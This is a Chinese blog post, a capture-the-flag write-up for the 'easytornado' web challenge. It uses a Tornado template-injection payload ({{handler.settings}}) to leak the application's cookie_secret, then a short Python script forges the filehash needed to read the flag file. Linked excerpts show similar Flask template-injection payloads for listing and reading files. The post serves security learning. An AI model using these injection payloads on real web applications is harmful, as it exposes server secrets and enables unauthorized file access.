攻防世界--Web进阶--easytornado---模板注入

最新推荐文章于 2024-04-24 23:01:31 发布
最新推荐文章于 2024-04-24 23:01:31 发布
阅读量252 收藏
点赞数
分类专栏: xctf攻防世界Web 文章标签: 模板注入 Tomato框架 cookie_secret filehash 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/120700786
版权

目录

信息搜集 

模板注入

生成filehash

信息搜集 

 

 发现flag的位置,于是我们试试能不能访问

 报错了

查看/welcome.txt

  由于render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面。

render({options})可以猜测有模板注入漏洞。

 /hints.txt提醒md5(cookie_secret+md5(filename))

 

 这个应该是file的hash算法了

filename应该是/fllllllllllllag   cookie_secret不清楚

模板注入

通过查阅文档发现cookie_secret在Application对象settings属性中,

因此注入

http://111.200.241.244:53902/error?msg={{Requsethandler.application.settings}}

 发现出错了。应该是被加入黑名单了

还发现self.application.settings有一个别名

RequestHandler.settings
An alias for self.application.settings.

handler指向的处理当前这个页面的RequestHandler对象, RequestHandler.settings指向self.application.settings, 因此handler.settings指向RequestHandler.application.settings。

因此注入

http://111.200.241.244:53902/error?msg={{handler.settings}}

生成filehash

import hashlib

def md5(s):
 return hashlib.md5(s.encode('utf-8')).hexdigest()  
//注意要先将字符串utf-8加密后再MD5 然后再返回加密字符串
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = 'de9d729b-c6d5-4422-903d-d3c5495865af'
 print(md5(cookie_secret+md5(filename)))

if __name__ == '__main__':
 filehash()

 Payload

​​http://111.200.241.244:53902/file?filename=/fllllllllllllag&filehash=0f73b42a93032d3fa60a3f09b6c22a13

Zhao蔫儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web进阶 easytornado模板注入
Hrain7的博客
11-24 717
分别点开三个文件 /flag.txt 由此可知,flag在 /fllllllllllllag 里面 /welcome.txt 发现render函数,百度一下,render是一个渲染函数,渲染变量到模板中,模板嘿嘿嘿,猜想可能存在模板注入吧,我所知道就这些请见谅。。。。 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 render配合Tornado使用。 /hints.txt md5(cookie_secret+md5(...
攻防世界shrine 模板注入
qq_43774856的博客
12-16 316
shrine 打开链接,这里直接给出了源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 383
攻防世界easytornado-tornado模板注入
tornado模板注入
最新发布
m0_74196038的博客
04-24 367
服务器端模板注入是指攻击者能够利用服务端所采用的模板(框架)语法将恶意有效负载注入模板中,然后在服务器端执行该模板。我在最后拿到cookie然后进行md5的时候,找了一个网站进行加盐的md5,但是结果不对,可能是我哪里搞错了。tornadopython当中的一个模板,因此这个漏洞是归属于SSTI(服务器模板漏洞),所谓的模板其实就是一种框架,python当中常见的模板漏洞还有flask。这是我在做一道ctf题目当中遇到的,不太会,所以浅浅学习了一下,跟大家分享。在Tornado里,应用的设置可以通过。
攻防世界 Web_python_template_injection
feng的博客
09-03 544
前言 这是一道关于python的flask模板注入的题目,刚碰到这个题目的时候我对于flask和模板注入是没有接触过的,因此上网查找相关知识并结合攻防世界给出的WP做出了这个题目。 做题前知识点的了解 https://xz.aliyun.com/t/3679 这篇博客对于我这样的萌新来说非常友好,对于flask的ssti模板注入讲解的很好,推荐一看。看完这个,就对flask的模板注入有了一个大致的了解,但是对于如何应用可能有些迷茫,下面结合攻防世界的这个题目来更加深入的了解。 WP 作为一个萌新,刚打开这个
计算机病毒攻防论文-(精选).pdf
11-17
计算机病毒攻防论文-(精选).pdf
信息网络攻防技术-网络安全.ppt
03-01
信息网络攻防技术-网络安全.ppt
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
计算机网络攻防-(共37张PPT).pptx
11-14
计算机网络攻防-(共37张PPT).pptx
mitm6-master.zip
01-06
中间人攻击是网络攻防战中的一个重要课题,它发生在两个通信方之间,攻击者通过某种方式插入到通信链路中,使得双方在不知情的情况下与攻击者进行通信,而非彼此直接交流。 中间人攻击的原理主要依赖于通信过程中的...
[wp] Web_python_template_injection 攻防世界
夏日 の blog
02-06 1331
打开题目我们看到 提示python模板注入,尝试{{1+1}}看看{{}}是否被执行 由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...
模板注入tornado_render)之[护网杯 2018]easy_tornado1
qq_58970968的博客
04-10 323
根据提供的三个文件可以知道,flag在fllllllllag目录下;根据题目tornado 还有提示render知道,这大概念是考模板注入{{}} ;然后观看URL发现,可以猜测: 这道题需要构造/file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename)) 当然在此之前用{{}}来注入会发现每次都会跳到error?msg 在这里构造{{1}}就会返回一个值;大可判定就是模板注入;关于rende...
攻防世界WEB高手进阶python_template_injection
uihijio的博客
05-18 436
打开网站是写着以下 然后测试以下{{1+1}}被执行了 然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag 使用{{’’.class.mro[2].subclasses()40.read()}}打开
[护网杯 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 660
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
pythonweb框架的tornado和flask模块注入
qq_53099802的博客
05-19 516
tornado的render模块注入和flask注入
tornado模板
Rick的博客
11-18 760
tornado模板模板 模板使用,特别之处就是在Application多了个指定模板路径的参数,告诉Tornado在哪里寻找模板文件 app = tornado.web.Application( handlers=[(r'/', IndexHandler), (r'/poem', PoemPageHandler)], template_path=os.path
buu web:[护网杯 2018]easy_tornadotornado render模板注入漏洞)
m0_55378150的博客
04-18 226
打开靶场 分别看一下有什么 应该都是一些小提示,可以看到url上的filename参数有点可疑,我们将第一个提示中的/fllllllllllllag放进去看看 报了个错 然后我们可以看到页面的Error也出现在了url上,我们换成其他东西试试 很可疑,可能存在模板注入,测试一下:{{2*2}} 这里我就看不懂了,百度了一手,才知道这是一个tornado render模板注入漏洞(我不懂原理,大家可以去看看大佬的题解),可以通过{{handler.settings}}拿...
攻防世界 python 注入漏洞
灰太的表格的博客
04-06 1168
web_python_template_injection解题思路: 首先看到题目,就知道这道题是关于模板注入的,什么是模板注入呢?-为了写html代码的时候方便,很多网站都会使用模板,先写好一个html模板文件,比如 deftest():code=request.args.get('id')html='''<h3>%s</h3>'''%(code)returnrender...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值